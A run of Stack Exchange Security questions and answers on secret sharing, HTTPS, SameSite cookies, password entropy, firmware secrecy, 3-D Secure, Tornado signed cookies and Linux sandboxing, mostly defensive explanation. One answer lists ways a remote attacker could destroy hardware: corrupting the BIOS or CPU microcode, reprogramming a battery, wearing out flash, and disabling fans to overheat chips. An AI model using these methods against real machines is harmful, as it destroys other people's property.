Just splitting the file up will not have the desired effect (as A.Hersean explains in their answer). I think what you're looking for is "Secret Sharing" algorithms, most notably Shamir's Secret Sharing algorithm (thanks @heinrich5991), where the secret is split up into N pieces and given to different people for safe-keeping. To reconstruct the secret, all N pieces (or in some variants, only k of the pieces) need to be brought together. The attacker gains no information unless they have the required number of pieces. Although used in many applications, I don't believe it is available in openssl or CAPI. There are many robust open source implementations -- see this question -- but you'll need to do some homework to decide if you trust the implementation to not be back-doored. There is also the related concept of "multi-party encryption", where you encrypt the secret with multiple people's public keys, and then all of them need to participate in decrypting it. Here's a SO thread about it: Encryption and decryption involving 3 parties. You can do a poor-man's version of this using only the RSA implementation you already have by chaining RSA encryption: RSA(key1, RSA(key2, RSA(key3, secret) ) ) If you want 3 people to encrypt, but only 2 of them need to be present to decrypt, then you can store 3 versions of the ciphertext: RSA(key1, RSA(key2, secret) ) RSA(key2, RSA(key3, secret) ) RSA(key1, RSA(key3, secret) )
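To illustrate how secret sharing differs from naively cutting the file in half, here is a minimal XOR-based 2-of-2 split in Python. This is not Shamir's scheme (which supports k-of-N thresholds), just the simplest construction: one share is pure randomness, so either share alone tells an attacker nothing.

```python
import secrets

def split_in_two(secret: bytes) -> tuple[bytes, bytes]:
    # share1 is uniformly random; share2 = secret XOR share1.
    share1 = secrets.token_bytes(len(secret))
    share2 = bytes(a ^ b for a, b in zip(secret, share1))
    return share1, share2

def recombine(share1: bytes, share2: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(share1, share2))

key = b"-----BEGIN PRIVATE KEY----- ..."  # placeholder for the real key file contents
first, second = split_in_two(key)
assert recombine(first, second) == key
```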
{ "source": [ "https://security.stackexchange.com/questions/168055", "https://security.stackexchange.com", "https://security.stackexchange.com/users/150059/" ] }
168,089
First of all, I am a web developer and not a security expert. I have read lots of articles about the difference between HTTPS and HTTP, including this site. The basic idea I got from them is that, when using HTTPS, everything is encrypted on the client side and then sent to the server (please correct me if I am wrong), so even our network admin or another person on the network can't get anything. When I use my laptop at home (trusted network), is there any advantage of using HTTPS over HTTP?
TLS provides three things: Confidentiality: that nobody can see the traffic between you and facebook.com (including the guy at the next table at Starbucks, your ISP, some sketchy network equipment in the datacentre, COUGH NSA, nobody). Integrity: that nobody is modifying the messages as they travel between you and facebook.com (this is separate from Confidentiality because some kinds of attacks allow you to modify the message in a malicious way even if you don't know what the messages are). Authentication: that you are talking to the authentic facebook.com server, not a spoofed version of it. "The basic idea I got from them is that, when using HTTPS, everything is encrypted on the client side and then sent to the server. (Please correct me if I am wrong)" That covers the confidentiality and integrity parts, but you're missing the authentication part: proving that you're not talking to a spoofed web server. Say I set up a phishing version of Facebook and I somehow hack into your home router (easy) or ISP (harder) so that when you type facebook.com it resolves to my IP address instead of the real one. I've created an exact copy of the login screen you expect and you'll enter your username and password. Muahaha! Now I have your username and password. How does HTTPS prevent this? Answer: with certificates. If we open up the certificate in my browser's Dev Tools > Security, we can see that facebook.com's certificate was issued by DigiCert. DigiCert is what's called a Publicly-trusted Certificate Authority (CA). In fact, DigiCert is one of the CAs that your browser inherently trusts because its "root certificate" is embedded into your browser's source code. You can see the full list of trusted root CAs by digging around in browser Settings and looking for "Certificates" or "Trusted Roots" or something. So, your browser inherently trusts DigiCert, and, through this certificate, DigiCert has certified that the server you are talking to is the real facebook.com (because it has the private key that matches the certificate). You get the green padlock and you know that everything is good. Just for fun, let's make a fake facebook.com. I added this line to my hosts file so that any time I type facebook.com it will redirect to google.com's IP address: 209.85.147.138 facebook.com Google, what'cha doing trying to steal my facebook password?? Thank goodness HTTPS is here to protect me! My browser is super unhappy because the certificate it was presented (for google.com) doesn't match the URL it requested (facebook.com). Thanks HTTPS!
{ "source": [ "https://security.stackexchange.com/questions/168089", "https://security.stackexchange.com", "https://security.stackexchange.com/users/156934/" ] }
168,344
I am a software tester, InfoSec is mostly tangential to my job, and people only ask me questions about InfoSec because I am not afraid to use Google or Stack Exchange when I don't know something. (which is most of the time) Our US operations manager wants to have a conversation with me to learn more about Information Security. He got an email from a prospect in the financial sector that includes this section: (a) ACME will ensure its information security program (“Info Security Program”) is designed and implemented, and during the term of this Agreement will continue to be designed and implemented, to: (1) reasonably and adequately mitigate any risks identified by either of the parties related to the Software and Services, and the protection of Customer Confidential Information disclosed to ACME or ACME Personnel, and (2) describe and report on its own risk assessments, risk management, control, and training of ACME Personnel in compliance with the Info Security Program, security oversight regarding ACME Personnel, and the process for the annual certification of the Info Security Program. ACME will safeguard against the destruction, loss, alteration, or unauthorized disclosure of or access to Customer Confidential Information in the possession of ACME Personnel, including through the use of encryption while transmitted or in transport, or while being stored, processed or managed on ACME equipment when such encryption required by Law, is advised by industry standards for similar products or services, or is required in an Transaction Document (collectively, the “Data Safeguards”). ACME will ensure that the Info Security Program is materially equivalent to Customer’s own information security standards in place from time to time applicable to the risks presented by the Products or Services (collectively the “IS Standards”). The parties may redefine the term “IS Standards” to mean any industry-recognized standard or testing protocol (e.g., NIST, ISO 27001/27002 or SSAE, AT101), if expressly set forth in an SOW. This language is so scary that I first pooped in my pants, and then created a security.stackexchange.com account to ask for advice because I don't even know where to start. We are a small software company (less than 40 people) that is fortunate enough to have some commercial success, and we're not careless about security, but we don't have any formal Information Security Program (yet). Some questions: Can someone please translate the above quote into common English? I read something about annual certification, would it be ok to say that our company should make use of a third party security auditor and let them tell us what we should do? Who within our organisation would typically be responsible for implementing an Information Security Program? I am thinking about recommending to buy ISO27001 (I mean the actual PDF file that contains the text of that standard, which can be purchased for 166 Swiss Franks from the iso.org store), but who should read it? (related to the previous question) Background information: We collect typical CRM information to be able to send invoices. We do not collect sensitive information, like data about the users/customers of our customers. Our support team may ask sample data for troubleshooting purposes, and will always ask for "dummy" or sanitized data that reproduces the issue at hand. This question is not a duplicate of How to communicate how secure your system is to your employer's clients . 
That post is about how to communicate to customers - we already know that, because the customer already told us which kind of communication they want - they mentioned a SOC Type 1 Report. It is also not a duplicate of How to get top management support for security projects? because management support is easy in our case: get security certified or miss out on big contracts.
I'll give it a shot. In a nutshell, the language is CYA in case you get breached or hacked and have access to their data, they can tell their customers "Acme said they had a security program and was protected so this is their fault". In that case if you end up being the cause of them losing data, they can blame you. That being said, its pretty standard contract language when companies are partnering or sharing data. Mostly its a "Due Diligence" type artifact. Regarding your questions: Can someone please translate the above quote into common English? Basically you need to have documented security policies/procedures. Within those documents you should state what you do to maintain systems and ensure that adequate security is provided. You should also try and address actual procedures that touch on security related subjects (access control, auditing, monitoring, incident response, etc.). You may already cover some of this in your normal Standard Operating Procedures (SOP) and you can reference those documents. When you create a new user or change groups/roles, are there written procedures for how to to it? Is there someone who approves that change? Those are the kinds of things that should be addressed. When they aren't written down, people don't have references for how to do them and they take liberties which may introduce security vulnerabilities. I read something about annual certification, would it be ok to say that our company should make use of a third party security auditor and let them tell us what we should do? This is the route a lot of organizations take, but security is definitely not something that should be reviewed "annually". It is an ongoing, forever process that should be integrated into your daily operations. That being said, a third party group can perform an "audit" that serves as your annual certification. The result of that will be a report that you can used to fix deficiencies and enhance your security posture. Highly recommend this, no matter how mature your security program is. The first few times you go through it, use different vendors so that you can compare the results. The quality of these types of assessments varies GREATLY. Who within our organisation would typically be responsible for implementing an Information Security Program? They go by many names, but the ultimate responsibility of security will lie with the system owner. That could be your CEO, the program manager, or in larger organizations an ISSO or Information System Security Officer. In smaller organizations, it usually falls to a Product or IT Manager. Hiring a consultant to help start this process may be a good idea at this stage. You're only going to see these requirements more often as you start working/partnering with large enterprises. I am thinking about recommending to buy ISO27001, but who should read it? (related to the previous question) What exactly are you considering buying ? ISO27001 is a security compliance framework that provides a direction for securing your assets/enterprise and as far as I know you shouldn't have to pay for anything upfront unless its a service or product. Choosing a compliance framework to base your program off of is a great first step in establishing a security program. I would personally recommend ISO or NIST as they are large international/national standards and have a lot of overlap with other compliance frameworks (PCI, HIPAA, etc.). 
That being said, I have no idea what your goals are so you'll have to do some research and choose what's best for your organization. I've written a lot of documentation and done a lot of security control testing so I may be opinionated at this point, but if you have additional questions, feel free to PM me. Good luck!
{ "source": [ "https://security.stackexchange.com/questions/168344", "https://security.stackexchange.com", "https://security.stackexchange.com/users/157803/" ] }
168,365
Is setting the SameSite attribute of a cookie to Lax the same as not setting it at all? If there are differences, what are they?
Is setting the SameSite attribute of a cookie to Lax the same as not setting the attribute? In Google Chrome < 76: no. Setting SameSite=lax is safer than omitting the attribute. (But if your implementation currently relies on cross-origin requests, double-check that adding the attribute doesn't break anything.) Here are the differences: When you don't set the SameSite attribute, the cookie is always sent. With SameSite=lax, the cookie is only sent on same-site requests or top-level navigation with a safe HTTP method. That is, it will not be sent with cross-domain POST requests or when loading the site in a cross-origin frame, but it will be sent when you navigate to the site via a standard top-level <a href=...> link. With SameSite=strict (or an invalid value), the cookie is never sent in cross-site requests. Even when clicking a top-level link on a third-party domain to your site, the browser will refuse to send the cookie. Starting with Chrome 76, your browser has an option to make a missing SameSite attribute behave like SameSite=Lax. This will be the default in Chrome 80. From the feature description: The Stable version of Chrome 80 is targeted for enabling this feature by default. The feature will be enabled in the Beta version only, starting in Chrome 78. This feature is available as of Chrome 76 by enabling the same-site-by-default-cookies flag. Also have a look at the RFC draft and Sjoerd's blog post.
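For reference, the attribute is simply appended to the Set-Cookie response header; a minimal example (the cookie name and value are placeholders):

```
Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=Lax
```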
{ "source": [ "https://security.stackexchange.com/questions/168365", "https://security.stackexchange.com", "https://security.stackexchange.com/users/157829/" ] }
168,452
What I would like to know is two fold: First off, what is sandboxing? Is it the trapping of OS system calls and then secondly deciding whether to allow it to pass through or not? How is it implemented to begin with? Would it be by way of hooks in the SSDT (kernel level)?
Well this answer ended up fairly long, but sandboxing is a huge topic. At its most basic, sandboxing is a technique to minimize the effect a program will have on the rest of the systems in the case of malice or malfunction. This can be for testing or for enhancing the security of a system. The reason one might want to use a sandbox also varies, and in some cases it is not even related to security, for example in the case of OpenBSD's systrace . The main uses of a sandbox are: Program testing to detect broken packages, especially during builds. Malware analysis to understand behavior of malicious software. Securing untrusted or unsafe applications to minimize damage they can do. There are many sandboxing techniques, all with differing threat models. Some may just reduce attack surface area by limiting APIs that can be used, while others define access controls using formalized models similar to Bell-LaPadula or Biba . I'll be describing a few popular sandboxing techniques, mostly for Linux, but I will also touch on other operating systems. Seccomp Seccomp is a Linux security feature that reduces kernel attack surface area. It is technically a syscall filter and not a sandbox, but is often used to augment sandboxes. There are two types of seccomp filters, called mode 1 (strict mode) and mode 2 (BPF mode). Mode 1 Seccomp mode 1 is the most strict, and original, mode. When a program enables mode 1 seccomp, it is limited to using only four hardcoded syscalls : read() , write() , exit() , and rt_sigreturn() . Any file descriptors that will be needed must be created before enforcing seccomp. In the case of a violation, the offending process is terminated with SIGKILL . Taken from another answer I wrote on another StackExchange site, a sample program that securely executes a function that returns 42 in bytecode: #include <unistd.h> #include <stdint.h> #include <stdio.h> #include <sys/prctl.h> #include <sys/syscall.h> #include <linux/seccomp.h> /* "mov al,42; ret" aka "return 42" */ static const unsigned char code[] = "\xb0\x2a\xc3"; int main(void) { int fd[2], ret; /* spawn child process, connected by a pipe */ pipe(fd); if (fork() == 0) { close(fd[0]); /* enter mode 1 seccomp and execute untrusted bytecode */ prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT); ret = (*(uint8_t(*)())code)(); /* send result over pipe, and exit */ write(fd[1], &ret, sizeof(ret)); syscall(SYS_exit, 0); } else { close(fd[1]); /* read the result from the pipe, and print it */ read(fd[0], &ret, sizeof(ret)); printf("untrusted bytecode returned %d\n", ret); return 0; } } Mode 2 Mode 2 seccomp, also called seccomp-bpf, involves a userspace-created policy being sent to the kernel , defining which syscalls are permitted, what arguments are allowed for those syscalls, and what action should be taken in the case of a syscall violation. The filter comes in the form of BPF bytecode, a special type instruction set that is interpreted in the kernel and used to implement filters. This is used in the Chrome/Chromium and OpenSSH sandbox on Linux, for example. 
A simple program that prints the current PID using seccomp-bpf: #include <seccomp.h> #include <unistd.h> #include <stdio.h> #include <errno.h> int main(void) { /* initialize the libseccomp context */ scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); /* allow exiting */ seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); /* allow getting the current pid */ seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0); /* allow changing data segment size, as required by glibc */ seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(brk), 0); /* allow writing up to 512 bytes to fd 1 */ seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 2, SCMP_A0(SCMP_CMP_EQ, 1), SCMP_A2(SCMP_CMP_LE, 512)); /* if writing to any other fd, return -EBADF */ seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(write), 1, SCMP_A0(SCMP_CMP_NE, 1)); /* load and enforce the filters */ seccomp_load(ctx); seccomp_release(ctx); printf("this process is %d\n", getpid()); return 0; } Because the Linux syscall ABI keeps arguments in general purpose registers, only these registers are validated by seccomp. This is fine in some cases, such as when an argument is a bitwise ORed list of flags, but in cases where the argument is a pointer to memory, filtering will not work. The reason for this is that the pointer only references memory, so validating the pointer only ensure that the pointer itself is allowed, not that the memory it is referencing has not been changed. This means that it is not possible to reliably filter certain arguments for syscalls like open() (where the path is a pointer to a null-terminated string in memory). To filter paths and similar objects, mandatory access controls or another LSM-based framework must be used. Pledge OpenBSD has added a syscall filter similar to (but more coarse-grained than) seccomp called pledge (previously tame ). Pledge is a syscall that applications can opt into, essentially "pledging" that they will limit their uses of various kernel interfaces. No matter how much the application begs, the kernel won't revoke the restrictions once they are in place, even if it changes its mind . Pledge allows an application to make a promise , which is a group of actions which will be permitted, with all others being denied. In essence, it is promising to only use functions it explicitly requests beforehand. Some (non-exhaustive) examples: The stdio promise allows basic functionality like closing file descriptors or managing memory. The rpath promise allows syscalls that can be used to read the filesystem. The wpath promise allows syscalls that can be used to write to the filesystem. The tmppath promise allows syscalls that can read/write, but only in /tmp . The id promise allows syscalls that are used to change credentials, like setuid() . Although pledge is much more coarse-grained than seccomp, it is, for this reason, much easier to use and maintain. Because of this, OpenBSD has progressed to adding pledge support to a wide variety of their base applications, from things as security-sensitive as sshd to things as trivial as cat . This "security by default" architecture ends up greatly improving the security of the system as a whole, even if individual promises are coarse-grained and not particularly flexible. Chroot A chroot is a *nix feature that allows setting a new path as the root directory for a given program, forcing it to see everything as relative to that path. 
This is not usually used for security, since a privileged program can often escape a chroot , and because it does not isolate IPC or networking, allowing even unprivileged processes to do mischief like killing other processes. In a touch, it can be used to augment other security techniques. It is very useful for preventing an application from doing accidental damage, and for giving legacy software a view of the filesystem that it expects. Chrooting bash , for example, would involve putting any executables and libraries it needs into the new directory, and running the chroot utility (which itself just calls the syscall of the same name ): host ~ # ldd /bin/bash linux-vdso.so.1 (0x0000036b3fb5a000) libreadline.so.6 => /lib64/libreadline.so.6 (0x0000036b3f6e5000) libncurses.so.6 => /lib64/libncurses.so.6 (0x0000036b3f47e000) libc.so.6 => /lib64/libc.so.6 (0x0000036b3f0bc000) /lib64/ld-linux-x86-64.so.2 (0x0000036b3f938000) host ~ # ldd /bin/ls linux-vdso.so.1 (0x000003a093481000) libc.so.6 => /lib64/libc.so.6 (0x000003a092e9d000) /lib64/ld-linux-x86-64.so.2 (0x000003a09325f000) host ~ # mkdir -p newroot/{lib64,bin} host ~ # cp -aL /lib64/{libreadline,libncurses,libc}.so.6 newroot/lib64 host ~ # cp -aL /lib64/ld-linux-x86-64.so.2 newroot/lib64 host ~ # cp -a /bin/{bash,ls} newroot/bin host ~ # pwd /root host ~ # chroot newroot /bin/bash bash-4.3# pwd / bash-4.3# ls bin lib64 bash-4.3# ls /bin bash ls bash-4.3# id bash: id: command not found Only a process with the CAP_SYS_CHROOT capability is able to enter a chroot. This is necessary to prevent a malicious program from creating its own copy of /etc/passwd in a directory it controls, and chrooting into it with a setuid program like su , tricking the binary into giving them root. Namespaces On Linux, namespaces are used to isolate system resources, giving a namespaced program a different understanding of what resources it owns. This is commonly used to implement containers. From the namespaces(7) manpage: A namespace wraps a global system resource in an abstraction that makes it appear to the process within the namespace that they have their own isolated instance of a global resource. Changes to the global resource are visible to other processes that are members of the namespace, but are invisible to other processes. There are 7 namespaces supported under Linux currently: cgroup - Cgroup root directory IPC - System V IPC and POSIX message queues Network - Network interfaces, stacks, ports, etc Mount - Mountpoints, similar in function to a chroot PID - Process IDs User - User and group IDs UTS - Hostname and domain name An example of PID namespaces using the unshare utility: host ~ # echo $$ 25688 host ~ # unshare --fork --pid host ~ # echo $$ 1 host ~ # logout host ~ # echo $$ 25688 While these can be used to augment sandboxing or even be used as an integral part of a sandbox, some of them can reduce security. User namespaces, when unprivileged (the default), expose a much greater attack surface area from the kernel. Many kernel vulnerabilities are exploitable by unprivileged processes when the user namespace is enabled. On some kernels, you can disable unprivileged user namespaces by setting kernel.unprivileged_userns_clone to 0, or, if that specific sysctl is not available on your system, setting user.max_user_namespaces to 0. If you are building your own kernel, you can set CONFIG_USER_NS=n to disable user namespaces globally. Mandatory Access Controls A MAC is a framework for defining what a program can and cannot do, on a whitelist basis. 
A program is represented as a subject . Anything the program wants to act on, such as a file, path, network interface, or port is represented as an object . The rules for accessing the object are called the permission , or flag. Take the AppArmor policy for the ping utility, with added comments: #include <tunables/global> /bin/ping { # use header files containing more rules #include <abstractions/base> #include <abstractions/consoles> #include <abstractions/nameservice> capability net_raw, # allow having CAP_NET_RAW capability setuid, # allow being setuid network inet raw, # allow creating raw sockets /bin/ping mixr, # allow mmaping, executing, and reading /etc/modules.conf r, # allow reading } With this policy in place, the ping utility, if compromised, cannot read from your home directory, execute a shell, write new files, etc. This kind of sandboxing is used for securing a server or workstation. Other than AppArmor, some popular MACs include SELinux , TOMOYO , and SMACK . These are typically implemented in the kernel as a Linux Security Module , or LSM. This is a subsystem under Linux that provides modules with hooks for various actions (like changing credentials and accessing objects) so they can enforce a security policy. Hypervisors A hypervisor is virtualization software. It usually leverages hardware features that allow isolating all system resources, such as CPU cores, memory, hardware, etc. A virtualized system believes not just that it has root, but that it has ring 0 (kernelmode). Hardware is either abstracted by the CPU (the case for the CPU cores and memory itself), or emulated by the hypervisor software (for more complex hardware, such as NICs). Because the guest is made to believe it owns the whole system, anything that can run on that architecture will tend to also run in the virtual machine, allowing a Linux host with a Windows guest, or a FreeBSD host with a Solaris guest. In theory , a hypervisor will prevent any actions in the guest from affecting the host. A useful resource that helps with a low-level understanding how a guest is set up is an LWN writeup on the KVM API . KVM is a kernel interface supported on Linux and Illumos (a family of open source forks of Solaris) for setting up virtual machines. As it's fairly low level (interaction only being through IOCTLs on a file descriptor opened against the /dev/kvm character device), it is typically the backend for projects like QEMU . KVM itself makes use of privileged hardware virtualization features such as VT-x on Intel processors and AMD-V on AMD. It's common for hypervisors, such as with the popular Cuckoo sandbox , to be used to assist in malware analysis. It creates a virtual machine that malware can be run on, and it analyzes the internal state of the system, reading memory contents, dumping memory, etc. Because it runs a full operating system, it is often more difficult for malware to realize it is running virtualized. Common techniques like attaching a dummy debugger to itself so it cannot be debugged can be fooled, though some malware can attempt to detect virtualization (with varying levels of sophistication). Hypervisor detection itself is a very broad and complex subject. Hypervisors are often (ab)used for security, such as by Qubes OS or Bromium (using the Xen hypervisor to isolate Fedora and Windows, respectively). Whether or not this is a good idea is often debated, due to bugs in Xen cropping up repeatedly. 
A famous and rather abrasive quote from Theo de Raddt, founder of OpenBSD, on the topic of virtualization when relied on for security: You are absolutely deluded, if not stupid, if you think that a worldwide collection of software engineers who can't write operating systems or applications without security holes, can then turn around and suddenly write virtualization layers without security holes. Whether or not a hypervisor is a good choice for security depends on many factors. It is typically easier to use and maintain, since it isolates an entire guest operating system, but it has a large attack surface area and does not provide fine-grained protections. Containers Containers are similar to hypervisors, but rather than using virtualization, they use namespaces. Each container has every resource put in its own namespace, allowing every container to run an independent operating system. The init process on the container sees itself as PID 1 running as root, but the host sees it as just another non-init and non-root PID. However, as they share the host's kernel, they can only run the same type of operating system as the host. Additionally, while containers can have root processes that can do privileged actions like setting up network interfaces (only in that container's namespace, of course), they cannot change global kernel settings that would affect all containers. Docker and OpenVZ are popular container implementations. Because containers fundamentally rely on user namespaces of various implementations (standard Linux namespaces for Docker, and a bespoke namespace technology for OpenVZ), they are often criticized for providing poor security . Container escapes and privilege escalation vulnerabilities are not uncommon on these systems. The reason for these security issues stems from the fact that the namespace root user can interact with the kernel in new and unexpected ways. While the kernel is designed not to let the namespace root user make any obviously dangerous changes to the system that cannot be kept in a namespace (like sysctl tweaks), the root is still able to interact with a lot more of the kernel than an unprivileged process. Because of this, a vulnerability that can only be exploited by root in the process of setting up a virtual network interface, for example, could be exploited by an unprivileged process if that process is able to enter a user namespace. This is an issue even if the syscalls can only "see" the network interface of the container. In the end, a user namespace simply allows an unprivileged user to interact with far more of the kernel. The surface area is increased to such an extent that many vulnerabilities that otherwise would be relatively harmless instead become LPEs. This is what happens when kernel developers tend not to keep a security mentality when writing code that only root can interact with. Other technologies Linux is certainly not the only operating system that has sandboxing. Many other operating systems have their own technology, implemented in various different ways and with varying threat models: AppContainer on Windows provides isolation similar to a combination of chroots and namespaces. Domains, files, networks, and even windows are isolated. Seatbelt on OSX acts as mandatory access controls, limiting the resources a confined application can access. It has seen its share of bypasses . Jails on FreeBSD build on the concept of chroot. It assigns an IP address to the program running in the jail and gives it its own hostname. 
Unlike a chroot, it is designed for security. Zones on Solaris are advanced containers that run a copy of Solaris' userland under the host's kernel. They are similar to FreeBSD Jails, but more feature-rich.
{ "source": [ "https://security.stackexchange.com/questions/168452", "https://security.stackexchange.com", "https://security.stackexchange.com/users/156881/" ] }
168,479
Could anyone point to a quote in a published work - or suggest a recognised expert who might provide a quote - which answers the following question How much entropy in a password would guarantee that it is secure against an offline guessing attack even if the attacker has the most powerful hardware in the world? I am writing an article about creating a secure password based on true randomness and I would like to include a figure for guaranteed security but I would rather not offer my own opinions and arguments, I would like to quote a recognised expert or published work. In more detail what is meant above by these terms is as follows. If a password has enough entropy then presumably it is uncrackable in our current threat model, which is the one where the attacker has a cryptographic hash of the password and is repeatedly making a password guess, hashing the guess and comparing the hash. By entropy I mean that the password creator has chosen randomly, with equal probability for each choice, a password from N possible passwords. The entropy in bits is then log₂(N) So quote needs to cover how much entropy in bits (or how big is N) to guarantee that the password is secure against this kind of attack, even if the attacker has the most powerful hardware in the world.
There's a quote for you in this crypto.SE answer, by Bruce Schneier in Applied Cryptography (1996), pp. 157–8. You can also find Bruce Schneier citing himself in his blog (2009), if you want an online citation. Here is the full quote, in case of the links breaking:

One of the consequences of the second law of thermodynamics is that a certain amount of energy is necessary to represent information. To record a single bit by changing the state of a system requires an amount of energy no less than kT, where T is the absolute temperature of the system and k is the Boltzman constant. (Stick with me; the physics lesson is almost over.) Given that k = 1.38×10^-16 erg/°Kelvin, and that the ambient temperature of the universe is 3.2°Kelvin, an ideal computer running at 3.2°K would consume 4.4×10^-16 ergs every time it set or cleared a bit. To run a computer any colder than the cosmic background radiation would require extra energy to run a heat pump.

Now, the annual energy output of our sun is about 1.21×10^41 ergs. This is enough to power about 2.7×10^56 single bit changes on our ideal computer; enough state changes to put a 187-bit counter through all its values. If we built a Dyson sphere around the sun and captured all of its energy for 32 years, without any loss, we could power a computer to count up to 2^192. Of course, it wouldn’t have the energy left over to perform any useful calculations with this counter.

But that’s just one star, and a measly one at that. A typical supernova releases something like 10^51 ergs. (About a hundred times as much energy would be released in the form of neutrinos, but let them go for now.) If all of this energy could be channeled into a single orgy of computation, a 219-bit counter could be cycled through all of its states.

These numbers have nothing to do with the technology of the devices; they are the maximums that thermodynamics will allow. And they strongly imply that brute-force attacks against 256-bit keys will be infeasible until computers are built from something other than matter and occupy something other than space.

Update: If you want a citation to assess the strength of a randomly generated password, you can use this website that is regularly updated with recommendations made by different institutes. A random password is equivalent to a symmetric key, so this is the value you are looking for. (Here is a wayback machine link, if this website were to close.)
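For what it's worth, those figures are easy to re-derive; the following is just a back-of-the-envelope check in Python using the same constants as the quote (nothing new is being claimed):

import math

k = 1.38e-16            # Boltzmann constant, erg per Kelvin (as in the quote)
T = 3.2                 # background temperature of the universe, Kelvin
erg_per_flip = k * T    # minimum energy to set or clear one bit: ~4.4e-16 erg

sun_year = 1.21e41      # annual energy output of the sun, erg
flips = sun_year / erg_per_flip
print(f"{flips:.2e} bit changes per year")              # ~2.74e56
print(f"log2 = {math.log2(flips):.1f}")                 # ~187.5 -> a 187-bit counter

print(f"32 years: log2 = {math.log2(32 * flips):.1f}")  # ~192.5 -> count up to 2^192

supernova = 1e51        # erg
print(f"supernova: log2 = {math.log2(supernova / erg_per_flip):.1f}")
# ~220.4 -- the same ballpark as the 219-bit counter in the quote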
{ "source": [ "https://security.stackexchange.com/questions/168479", "https://security.stackexchange.com", "https://security.stackexchange.com/users/157934/" ] }
168,620
When working with Internet of Things devices, is it recommend to obfuscate or encrypt firmware images pushed to clients? This to make reverse engineering harder. (They should be signed of course)
No. You should not rely upon the obscurity of your firmware in order to hide potential security vulnerabilities that exist regardless of whether or not you encrypt/obfuscate your firmware. I have a radical suggestion: do the exact opposite. Make your firmware binaries publicly available and downloadable, freely accessible to anyone who wants them. Add a page on your site with details on how to contact you about security issues. Engage with the security community to improve the security of your product.
{ "source": [ "https://security.stackexchange.com/questions/168620", "https://security.stackexchange.com", "https://security.stackexchange.com/users/128901/" ] }
168,681
Hypothetical scenario (please note that this is indeed hypothetical, and I would never dream of actually doing this. I'm asking out of curiosity.) I have a normal desktop computer with a clean installation of Windows 10 and no personal or sensitive data on the machine at all. The computer is not sharing a local network with any other devices. This is a normal system, and not a virtual machine. I give a malicious user remote access to this machine, through the software TeamViewer. The peripherals like USB keyboard, mouse, etc, are disconnected the moment he gets access. The malicious user can spend a few hours doing whatever they want. After the malicious user is done, the computer is immediately shut down. I then boot from a Linux live CD, format the internal drive of the computer, and install a clean installation of an operating system (Either Windows 10 or Debian, for example.) there are no other storage devices connected to the computer. In this case in what ways could my computer still be compromised or damaged? We can say that the malicious user knew I might format the drive, and prepared especially for that. They might simply have been interested in doing damage, or compromising the computer in some way.
On some CRT monitors there was a relay that was engaged when changing screen mode. By changing screen mode repeatedly very fast, it was possible to destroy this relay. Apparently some modern monitors can be wrecked by forcing them into invalid screen modes, but they must be pretty rubbish monitors. Someone has mentioned flashing the BIOS to wreck that. The microcode on some CPUs can be amended: wreck the CPU. If it is a laptop, it may be possible to wreck the battery by reprogramming it: http://www.pcworld.com/article/236875/batteries_go_boom.html With flash memory based SSDs or USB drives, re-write the same part of memory over and over to have it reach its end of life sooner. On a cheap hard drive, forcing the stepper motor to push the drive heads fully one way beyond the end of the drive and then step back, repeatedly, could knock the heads out of alignment. I've known drives where the heads could get stuck if sent beyond their proper range (Tulip brand PCs in the 1990s). I also wonder if you could change any BIOS settings such that the RAM or CPU or even GPU could be damaged, by overclocking or changing the board voltages. Cook the GPU by driving it hard after over-riding its automatic temperature control. Ditto for the CPU. Change BIOS settings to turn off the CPU fan then drive the CPU hard enough to cook it.
{ "source": [ "https://security.stackexchange.com/questions/168681", "https://security.stackexchange.com", "https://security.stackexchange.com/users/105562/" ] }
168,726
I have set a "3-d secure password" for my debit card, on my bank's website. But when I purchased something in amazon.co.uk, I went through the whole process without ever being asked for that 3D password. I was asked for a card number and its expiration date. Can anyone explain to me what happened? I live in Bulgaria. Note: I also wasn't asked for CVC.
Security measures like "3D password", CVV, etc. do not exist to protect you the cardholder . Do not assume that someone who lacks them can't use your card number fraudulently. All they do is allow a merchant who chooses to use them as part of their card processing merchant agreement to obtain a lower transaction fee, on the basis that the feature reduce the rate of fraudulent transactions and thus chargebacks. If anything, these features actually hurt you as the cardholder, as they make it easier for the merchant to "prove" you authorized a transaction and harder for you to dispute it. See my answer to a related question here: https://money.stackexchange.com/questions/54772/why-does-the-introduction-of-chip-pin-appear-to-be-so-controversial-in-the-uni/54780#54780
{ "source": [ "https://security.stackexchange.com/questions/168726", "https://security.stackexchange.com", "https://security.stackexchange.com/users/103659/" ] }
168,807
I've heard that cookies is less secure than the session. For example, if a web uses a cookie to detect if an user has logged in or not, people can forge a cookie to simulate a false user because he can read the cookie and forge one easily. Here is a link that I've found: Session vs Cookie Authentication Now I'm using Tornado with python to build a website. Here is a simple example of the module of login with Tornado: https://stackoverflow.com/questions/6514783/tornado-login-examples-tutorials To my surprise, there is no session in Tornado. Its doc says that there is the secure cookies but I don't think it is safer than ordinary cookies. ordinary cookie: browser ------- I'm Tom, my password is 123 -------> server secure cookie: browser ------ &^*Y()UIH|>Guho976879 --------> server I'm thinking that if I could get &^*Y()UIH|>Guho976879 , I can still forge the cookie, right? If I'm correct, why doesn't Tornado have the session? Or is there some way that can make the secure cookie is the same secure as the session? Maybe that I erase the cookies when the browser is closed can be safer?
I've heard that cookies is less secure than the session. You must have misinterpreted something. In fact HTTP sessions are usually implemented using cookies. I'm thinking that if I could get &^*Y()UIH|>Guho976879, I can still forge the cookie, right? Sure you can change the cookie, but will it be accepted by the server as valid? If you take an actual look at the documentation you'll see: Cookies are not secure and can easily be modified by clients. If you need to set cookies to, e.g., identify the currently logged in user, you need to sign your cookies to prevent forgery . Tornado supports signed cookies with the set_secure_cookie and get_secure_cookie methods. ... Signed cookies contain the encoded value of the cookie in addition to a timestamp and an HMAC signature. If the cookie is old or if the signature doesn’t match, get_secure_cookie will return None just as if the cookie isn’t set . Thus, if you try to manipulate the secure cookie the framework will notice and treat the cookie as invalid, i.e. like the cookie was never sent in the first place.
